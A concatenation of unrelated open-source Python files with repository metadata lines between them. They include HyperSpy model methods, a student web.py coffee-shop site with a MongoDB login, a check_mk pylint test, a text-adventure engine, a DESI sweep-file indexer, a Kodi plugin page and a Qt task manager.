component_list : None, or list of hyperspy components, optional
If None, will apply the function to all components in the model.
If list of components, will apply the functions to the components
in the list. The components can be specified by name, index or
themselves.
parameter_name_list : None or list of strings, optional
If None, will set all the parameters to not free.
If list of strings, will set all the parameters with the same name
as the strings in parameter_name_list to not free.
Examples
--------
>>> v1 = components.Voigt()
>>> m.append(v1)
>>> m.set_parameters_not_free()
>>> m.set_parameters_not_free(component_list=[v1],
parameter_name_list=['area','centre'])
See also
--------
set_parameters_free
hyperspy.component.Component.set_parameters_free
hyperspy.component.Component.set_parameters_not_free
"""
if not component_list:
component_list = []
for _component in self:
component_list.append(_component)
else:
component_list = [self._get_component(x) for x in component_list]
for _component in component_list:
_component.set_parameters_not_free(parameter_name_list)
def set_parameters_free(self, component_list=None,
parameter_name_list=None):
"""
Sets the parameters in a component in a model to free.
Parameters
----------
component_list : None, or list of hyperspy components, optional
If None, will apply the function to all components in the model.
If list of components, will apply the functions to the components
in the list. The components can be specified by name, index or
themselves.
parameter_name_list : None or list of strings, optional
If None, will set all the parameters to not free.
If list of strings, will set all the parameters with the same name
as the strings in parameter_name_list to not free.
Examples
--------
>>> v1 = components.Voigt()
>>> m.append(v1)
>>> m.set_parameters_free()
>>> m.set_parameters_free(component_list=[v1],
parameter_name_list=['area','centre'])
See also
--------
set_parameters_not_free
hyperspy.component.Component.set_parameters_free
hyperspy.component.Component.set_parameters_not_free
"""
if not component_list:
component_list = []
for _component in self:
component_list.append(_component)
else:
component_list = [self._get_component(x) for x in component_list]
for _component in component_list:
_component.set_parameters_free(parameter_name_list)
def set_parameters_value(
self,
parameter_name,
value,
component_list=None,
only_current=False):
"""
Sets the value of a parameter in components in a model to a specified
value
Parameters
----------
parameter_name : string
Name of the parameter whos value will be changed
value : number
The new value of the parameter
component_list : list of hyperspy components, optional
A list of components whos parameters will changed. The components
can be specified by name, index or themselves.
only_current : bool, default False
If True, will only change the parameter value at the current
position in the model.
If False, will change the parameter value for all the positions.
Examples
--------
>>> v1 = components.Voigt()
>>> v2 = components.Voigt()
>>> m.extend([v1,v2])
>>> m.set_parameters_value('area', 5)
>>> m.set_parameters_value('area', 5, component_list=[v1])
>>> m.set_parameters_value('area', 5, component_list=[v1],
only_current=True)
"""
if not component_list:
component_list = []
for _component in self:
component_list.append(_component)
else:
component_list = [self._get_component(x) for x in component_list]
for _component in component_list:
for _parameter in _component.parameters:
if _parameter.name == parameter_name:
if only_current:
_parameter.value = value
_parameter.store_current_value_in_array()
else:
_parameter.value = value
_parameter.assign_current_value_to_all()
def set_component_active_value(
self, value, component_list=None, only_current=False):
"""
Sets the component 'active' parameter to a specified value
Parameters
----------
value : bool
The new value of the 'active' parameter
component_list : list of hyperspy components, optional
A list of components whos parameters will changed. The components
can be specified by name, index or themselves.
only_current : bool, default False
If True, will only change the parameter value at the current
position in the model.
If False, will change the parameter value for all the positions.
Examples
--------
>>> v1 = components.Voigt()
>>> v2 = components.Voigt()
>>> m.extend([v1,v2])
>>> m.set_component_active_value(False)
>>> m.set_component_active_value(True, component_list=[v1])
>>> m.set_component_active_value(False, component_list=[v1],
only_current=True)
"""
if not component_list:
component_list = []
for _component in self:
component_list.append(_component)
else:
component_list = [self._get_component(x) for x in component_list]
for _component in component_list:
_component.active = value
if _component.active_is_multidimensional:
if only_current:
_component._active_array[
self.axes_manager.indices[
::-
1]] = value
else:
_component._active_array.fill(value)
def __getitem__(self, value):
"""x.__getitem__(y) <==> x[y]"""
if isinstance(value, basestring):
component_list = []
for component in self:
if component.name:
if component.name == value:
component_list.append(component)
elif component._id_name == value:
component_list.append(component)
if component_list:
if len(component_list) == 1:
return(component_list[0])
else:
raise ValueError(
"There are several components with "
"the name \"" + str(value) + "\"")
else:
raise ValueError(
"Component name \"" + str(value) +
"\" not found in model")
else:
return list.__getitem__(self, value)
| gpl-3.0 | -5,660,573,258,302,874,000 | 37.328125 | 79 | 0.546257 | false |
torresj/practica-3 | Código/tiposCafes.py | 1 | 18836 | /*
Esta archivo pertenece a la aplicación "practica 3" bajo licencia GPLv2.
Copyright (C) 2014 Jaime Torres Benavente.
Este programa es software libre. Puede redistribuirlo y/o modificarlo bajo los términos
de la Licencia Pública General de GNU según es publicada por la Free Software Foundation,
bien de la versión 2 de dicha Licencia o bien (según su elección) de cualquier versión
posterior.
Este programa se distribuye con la esperanza de que sea útil, pero SIN NINGUNA GARANTÍA,
incluso sin la garantía MERCANTIL implícita o sin garantizar la CONVENIENCIA PARA UN
PROPÓSITO PARTICULAR. Véase la Licencia Pública General de GNU para más detalles.
Debería haber recibido una copia de la Licencia Pública General junto con este programa.
Si no ha sido así, escriba a la Free Software Foundation, Inc., en 675 Mass Ave, Cambridge,
MA 02139, EEUU.
*/
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 30 12:07:52 2013
@author: jaime
"""
import web
from web.contrib.template import render_mako
from web import form
import pymongo
import feedparser
import time
render = render_mako(
directories=['plantillas'],
input_encoding='utf-8',
output_encoding='utf-8',
)
'''
Esta funcion sirve para actualizar el tiempo del ultimo
acceso al rss, si fuera necesario. Comprobara si han pasado
mas de 10 minutos desde la ultima vez, y si es asi, volverá
a descargar el rss
'''
def actualiza_tiempo():
conn=pymongo.MongoClient()
db=conn.mydb
cache=db.cache
tiempo1=time.time()
t=cache.find_one({"rss":"el pais"})
tiempo2=t[u'ult_act']
if((tiempo2- tiempo1)>600):
cache.update({"rss": "el pais"}, {"$set": {"ult_act": time.time()}})
rss=feedparser.parse('http://ep00.epimg.net/rss/tags/ultimas_noticias.xml')
conn.close()
#Variable para RSS, también almacenamos el momento en que se descargo el rss
rss=feedparser.parse('http://ep00.epimg.net/rss/tags/ultimas_noticias.xml')
actualiza_tiempo()
#Validadores
vpass=form.regexp(r'.{7,20}$',"La contrasenia debe tener mas de 7 caracteres")
#Formulario Para el login
formul = form.Form(
form.Textbox("user",form.notnull,description = "Usuario:"),
form.Password("password",form.notnull,vpass,description = "Contraseña:"),
form.Button("Login")
)
#Clases para manejar las paginas de los tipos de cafes
class Cafe1:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
#Variables para rellenar la pagina web
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 1"
cuerpo="Descripcion detallada del cafe 1"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
modo="index"
error=''
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 1"
cuerpo="Descripcion del cafe 1"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
#buscamos al usuario en la base de datos
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
error='contrasña erronea'
except TypeError:
log=False;
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
class Cafe2:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
#Variables para rellenar la pagina web
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 2"
cuerpo="Descripcion detallada del cafe 2"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 2"
cuerpo="Descripcion del cafe 2"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
#buscamos al usuario en la base de datos
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
error='contrasña erronea'
except TypeError:
log=False;
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
class Cafe3:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
#Variables para rellenar la pagina web
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 1"
cuerpo="Descripcion detallada del cafe 3"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 3"
cuerpo="Descripcion del cafe 3"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
#buscamos al usuario en la base de datos
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
error='contrasña erronea'
except TypeError:
log=False;
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
class Cafe4:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
#Variables para rellenar la pagina web
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 4"
cuerpo="Descripcion detallada del cafe 4"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 4"
cuerpo="Descripcion del cafe 4"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
#buscamos al usuario en la base de datos
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
error='contrasña erronea'
except TypeError:
log=False;
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
| gpl-2.0 | -8,106,485,634,979,966,000 | 29.345161 | 155 | 0.523015 | false |
huiyiqun/check_mk | tests/pylint/test_pylint_inventory_plugins.py | 1 | 1622 | #!/usr/bin/python
# encoding: utf-8
import os
import sys
from testlib import repo_path
import testlib.pylint_cmk as pylint_cmk
def test_pylint_inventory_plugins(pylint_test_dir):
f = file(pylint_test_dir + "/cmk-inventory-plugins.py", "w")
# Fake data structures where checks register (See cmk_base/checks.py)
f.write("""
check_info = {}
check_includes = {}
precompile_params = {}
check_default_levels = {}
factory_settings = {}
check_config_variables = []
snmp_info = {}
snmp_scan_functions = {}
active_check_info = {}
special_agent_info = {}
inv_info = {} # Inventory plugins
inv_export = {} # Inventory export hooks
def inv_tree_list(path):
return inv_tree(path, [])
def inv_tree(path, default_value=None):
if default_value != None:
node = default_value
else:
node = {}
return node
""")
# add the modules
pylint_cmk.add_file(f, repo_path() + "/cmk_base/check_api.py")
# add the modules
pylint_cmk.add_file(f, repo_path() + "/cmk_base/inventory_plugins.py")
# Now add the checks
for path in pylint_cmk.check_files(repo_path() + "/checks"):
pylint_cmk.add_file(f, path)
# Now add the inventory plugins
for path in pylint_cmk.check_files(repo_path() + "/inventory"):
pylint_cmk.add_file(f, path)
f.close()
exit_code = pylint_cmk.run_pylint(pylint_test_dir)
assert exit_code == 0, "PyLint found an error in inventory plugins"
| gpl-2.0 | -9,162,550,503,937,921,000 | 27.45614 | 74 | 0.580148 | false |
sleepinghungry/wwif | basic_game/basic_game_engine.py | 1 | 5705 | from basic_game.descriptors import Descriptor
from basic_game.directions import directions
from basic_game.language import list_prefix, normalize_input, get_noun, prepositions
from basic_game.objects import Container
from basic_game.writer import DEBUG, ConsoleWriter
from basic_game.verbs import BaseVerb
class BasicGameEngine(object):
"""Given a completed GameWorld, starts a game."""
def __init__(self, basic_game_world):
self.writer = ConsoleWriter()
self.descriptor = Descriptor(self.writer)
self.game = basic_game_world
self.player = basic_game_world.player
self.animals = basic_game_world.animals
self.done = False
self.turn_count = 0
self.points = 0
basic_game_world.writer = self.writer
basic_game_world.engine = self
def run(self):
"""Run the main loop until game is done.
"""
while not self.done:
self._describe_setting()
if self.player.location.game_end:
if self.player.location.game_end.check(self.game, self.player.location):
self.writer.output(self.player.location.game_end.text)
break
if self.player.game_end:
if self.player.game_end.check(self.game, self.player):
self.writer.output(self.player.game_end.text)
break
if self.player.health < 0:
self.writer.output("Better luck next time!")
break
command = self._get_input()
if command == 'q' or command == 'quit':
break
self._do_action(command)
self.writer.output("\ngoodbye!\n")
def _describe_setting(self):
"""Describe the new setting and actors that the player has encountered.
"""
actor = self.player
# if the actor moved, describe the room
if actor.check_if_moved():
self.descriptor.output_title(actor.location)
self.descriptor.output_stats(self.turn_count, self.points)
self.descriptor.output_location_description(actor.location)
# See if the animals want to do anything
for animal in self.animals.values():
# first check that it is not dead
if animal.health >= 0:
animal.act_autonomously(actor.location)
def _get_input(self):
""" Request and parse out player input."""
self.writer.clear_text()
self.writer.output("")
user_input = input("> ")
# remove punctuation and unecessary words
command = normalize_input(user_input)
return command
def _do_action(self, command):
actor = self.player
words = command.split()
if not words:
return
# following the Infocom convention commands are decomposed into
# VERB(verb), OBJECT(noun), INDIRECT_OBJECT(indirect).
# For example: "hit zombie with hammer" = HIT(verb) ZOMBIE(noun) WITH HAMMER(indirect).
things = list(actor.inventory.values()) + \
list(actor.location.contents.values()) + \
list(actor.location.exits.values()) + \
list(actor.location.actors.values()) + \
[actor.location] + \
[actor]
for c in actor.location.contents.values():
if isinstance(c, Container) and c.is_open:
things += c.contents.values()
potential_verbs = []
for t in things:
potential_verbs += t.verbs.keys()
# extract the VERB
verb = None
potential_verbs.sort(key=lambda key : -len(key))
for v in potential_verbs:
vv = v.split()
if list_prefix(vv, words):
verb = v
words = words[len(vv):]
if not verb:
verb = words[0]
words = words[1:]
# extract the OBJECT
noun = None
if words:
(noun, words) = get_noun(words, things)
# extract INDIRECT (object) in phrase of the form VERB OBJECT PREPOSITION INDIRECT
indirect = None
if len(words) > 1 and words[0].lower() in prepositions:
(indirect, words) = get_noun(words[1:], things)
self.turn_count += 1
# first check phrases
for thing in things:
f = thing.get_phrase(command, things)
if f:
if isinstance(f, BaseVerb):
if f.act(actor, noun, words):
return
else:
f(self.game, thing)
return
# if we have an INDIRECT object, try it's handle first
# e.g. "hit cat with hammer" -> hammer.hit(actor, 'cat', [])
if indirect:
# try inventory and room contents
things = list(actor.inventory.values()) + \
list(actor.location.contents.values())
for thing in things:
if indirect == thing.name:
v = thing.get_verb(verb)
if v:
if v.act(actor, noun, words):
return
for a in actor.location.actors.values():
if indirect == a.name:
v = a.get_verb(verb)
if v:
if v.act(a, noun, words):
return
# if we have a NOUN, try it's handler next
if noun:
for thing in things:
if noun == thing.name:
v = thing.get_verb(verb)
if v:
if v.act(actor, None, words):
return
for a in actor.location.actors.values():
if noun == a.name:
v = a.get_verb(verb)
if v:
if v.act(a, None, words):
return
# location specific VERB
v = actor.location.get_verb(verb)
if v:
if v.act(actor, noun, words):
return
# handle directional moves of the actor
if not noun:
if verb in directions:
actor.act_go1(actor, verb, None)
return
# general actor VERB
v = actor.get_verb(verb)
if v:
if v.act(actor, noun, words):
return
# not understood
self.writer.output("Huh?")
self.turn_count -= 1
return
| mit | -2,709,970,980,162,616,300 | 27.242574 | 91 | 0.603856 | false |
desihub/desitarget | py/desitarget/train/data_collection/sweep_meta.py | 1 | 2600 | #!/usr/bin/env python
import sys
import subprocess
import numpy as np
import astropy.io.fits as fits
def sweep_meta(release, outfits):
if (release == 'dr3'):
sweepdir = '/global/project/projectdirs/cosmo/data/legacysurvey/dr3/sweep/3.1'
if (release == 'dr4'):
sweepdir = '/global/project/projectdirs/cosmo/data/legacysurvey/dr4/sweep/4.0'
if (release == 'dr5'):
sweepdir = '/global/project/projectdirs/cosmo/data/legacysurvey/dr5/sweep/5.0'
if (release == 'dr6'):
sweepdir = '/global/project/projectdirs/cosmo/data/legacysurvey/dr6/sweep/6.0'
if (release == 'dr7'):
sweepdir = '/global/project/projectdirs/cosmo/data/legacysurvey/dr7/sweep/7.1'
if (release == 'dr8n'): # BASS/MzLS
sweepdir = '/global/project/projectdirs/cosmo/data/legacysurvey/dr8/north/sweep/8.0'
if (release == 'dr8s'): # DECaLS
sweepdir = '/global/project/projectdirs/cosmo/data/legacysurvey/dr8/south/sweep/8.0'
if (release == 'dr9n'):
sweepdir = '/global/cscratch1/sd/adamyers/dr9m/north/sweep/'
if (release == 'dr9s'):
sweepdir = '/global/cscratch1/sd/adamyers/dr9m/south/sweep/'
# listing the sweep files
tmpstr = "ls " + sweepdir + "/sweep-???[pm]???-???[pm]???.fits | awk -F \"/\" \"{print $NF}\""
p1 = subprocess.Popen(tmpstr, stdout=subprocess.PIPE, shell=True)
sweeplist = np.array(p1.communicate()[0].decode('ascii').split('\n'))[:-1]
nsweep = len(sweeplist)
ramin, ramax, decmin, decmax = np.zeros(nsweep), np.zeros(nsweep), np.zeros(nsweep), np.zeros(nsweep)
for i in range(nsweep):
sweeplist[i] = sweeplist[i][-26:]
sweep = sweeplist[i]
ramin[i] = float(sweep[6:9])
ramax[i] = float(sweep[14:17])
if (sweep[9] == 'm'):
decmin[i] = -1. * float(sweep[10:13])
else:
decmin[i] = float(sweep[10:13])
if (sweep[17] == 'm'):
decmax[i] = -1. * float(sweep[18:21])
else:
decmax[i] = float(sweep[18:21])
collist = []
collist.append(fits.Column(name='sweepname', format='26A', array=sweeplist))
collist.append(fits.Column(name='ramin', format='E', array=ramin))
collist.append(fits.Column(name='ramax', format='E', array=ramax))
collist.append(fits.Column(name='decmin', format='E', array=decmin))
collist.append(fits.Column(name='decmax', format='E', array=decmax))
cols = fits.ColDefs(collist)
hdu = fits.BinTableHDU.from_columns(cols)
hdu.writeto(outfits, overwrite=True)
| bsd-3-clause | -4,179,563,077,889,233,000 | 42.067797 | 105 | 0.609615 | false |
generia/plugin.video.zdf_de_2016 | de/generia/kodi/plugin/frontend/zdf/AbstractPage.py | 1 | 3319 | from de.generia.kodi.plugin.frontend.base.Pagelet import Item
from de.generia.kodi.plugin.frontend.base.Pagelet import Action
from de.generia.kodi.plugin.frontend.base.Pagelet import Pagelet
from de.generia.kodi.plugin.frontend.zdf.Constants import Constants
class AbstractPage(Pagelet):
def _createItem(self, teaser):
settings = self.settings
item = None
genre = ''
sep = ''
if teaser.genre:
genre += sep + teaser.genre
sep = ' | '
if teaser.category:
genre += sep + teaser.category
title = teaser.title
#self.log.info("settings.mergeCategoryAndTitle: {} - cat: {}, title: {}, starts: {}.", self.settings.mergeCategoryAndTitle, teaser.category, title, title.startswith(teaser.category))
if settings.mergeCategoryAndTitle and settings.showGenreInTitle:
if teaser.category is not None and title.startswith(teaser.category):
title = title[len(teaser.category):].strip()
#self.log.info("settings.mergeCategoryAndTitle: {} - cat: {}, title: {}, starts: {}.", settings.mergeCategoryAndTitle, teaser.category, title, title.startswith(teaser.category))
if teaser.label is not None and teaser.label != "" and settings.showTagsInTitle:
label = teaser.label
if teaser.type is not None:
label = teaser.type.capitalize() + ": " + label
title = '[' + label + '] ' + title
title.strip()
if teaser.season is not None and teaser.episode is not None and settings.showEpisodeInTitle:
title = str(self._(32047, teaser.season, teaser.episode)) + " - " + title
if teaser.playable and settings.showPlayableInTitle:
title = '(>) ' + title
if genre is not None and genre != "" and settings.showGenreInTitle:
title = '[' + genre + '] ' + title
title = title.strip()
if teaser.date is not None and settings.showDateInTitle:
title = teaser.date + " " + title
isFolder = False
#self.log.info("_createItem: title='{}' contentName='{}' playable='{}'", title, teaser.contentName, teaser.playable)
if teaser.contentName is not None and teaser.playable:
params = {'contentName': teaser.contentName, 'title': title}
if teaser.apiToken is not None:
params['apiToken'] = teaser.apiToken
if teaser.url is not None:
params['videoUrl'] = teaser.url
if teaser.date is not None:
params['date'] = teaser.date
if teaser.duration is not None:
params['duration'] = teaser.duration
if genre is not None:
params['genre'] = genre
action = Action(pagelet='PlayVideo', params=params)
isFolder = False
else:
action = Action(pagelet='RubricPage', params={'rubricUrl': teaser.url})
self.info("redirecting to rubric-url '{}' and teaser-title '{}' ...", teaser.url, title)
isFolder = True
#return None
item = Item(title, action, teaser.image, teaser.text, genre, teaser.date, teaser.duration, isFolder, teaser.playable)
return item
| gpl-2.0 | 3,053,792,430,717,883,400 | 46.414286 | 190 | 0.597168 | false |
jinzekid/codehub | python/test_gui/TaskManager/TaskManager.py | 1 | 2820 | # Author: Jason Lu
import _thread as thread, time
import threading
from MyWindow import Ui_MainWindow as MainWindow
from PyQt5.QtCore import QThread, pyqtSignal, QObject, QDateTime
import LYUtils as utils
# 单例模式
# 使用__new__方法
class Singleton(object):
def __new__(cls, *args, **kwargs):
if not hasattr(cls, '_instance'):
orig = super(Singleton, cls)
cls._instance = orig.__new__(cls, *args, **kwargs)
return cls._instance
# 装饰器版本
def singleton(cls, *args, **kwargs):
instances = {}
def getinstance():
if cls not in instances:
instances[cls] = cls(*args, **kwargs)
return instances[cls]
return getinstance
@singleton
class TaskManager(QObject):
listOfTasks = []
timer = None
mainWindow = None
# 通过类成员对象定义信号
update_date = pyqtSignal(int, str)
def init_taskManager(self, func_refresh_del_task):
self.timer = None
self.listOfTasks = []
self.removeTasks= []
self.refresh_del_task = func_refresh_del_task
# 开启新线程
#thread.start_new_thread(self.do_task, ())
pass
def enqueue(self, task):
if not task:return
self.listOfTasks.append(task)
print(">>新任务入队列 ")
def dequeue(self, task):
pass
def get_list_of_tasks(self):
return self.listOfTasks
def destory_task(self, taskToken):
# 倒序循环删除
for i in range(len(self.listOfTasks)-1, -1, -1):
task = self.listOfTasks[i]
if task.taskToken == taskToken:
self.refresh_del_task(i, task)
self.listOfTasks.pop(i)
def run(self):
while True:
curTime = int(time.time()) # 获取时间戳
"""
print("cur time:" + str(curTime) + ", 任务数量: " + str(len(
self.listOfTasks)))
"""
time.sleep(1)
# 倒序循环删除
for i in range(len(self.listOfTasks)-1, -1, -1):
task = self.listOfTasks[i]
"""
print('task token:' + task.taskToken +
', left time:' + str(utils.format_time(task.leftTime)))
"""
# 循环更新任务剩余时间
task.update_task_info(curTime)
if task.is_ready():
if task.is_start(curTime):
task.do_task()
else:
self.update_date.emit(i,
str(utils.format_time(task.leftTime)))
elif task.is_done():
self.refresh_del_task(i, task)
self.listOfTasks.pop(i)
| gpl-3.0 | -6,348,898,284,641,424,000 | 25.613861 | 79 | 0.519345 | false |
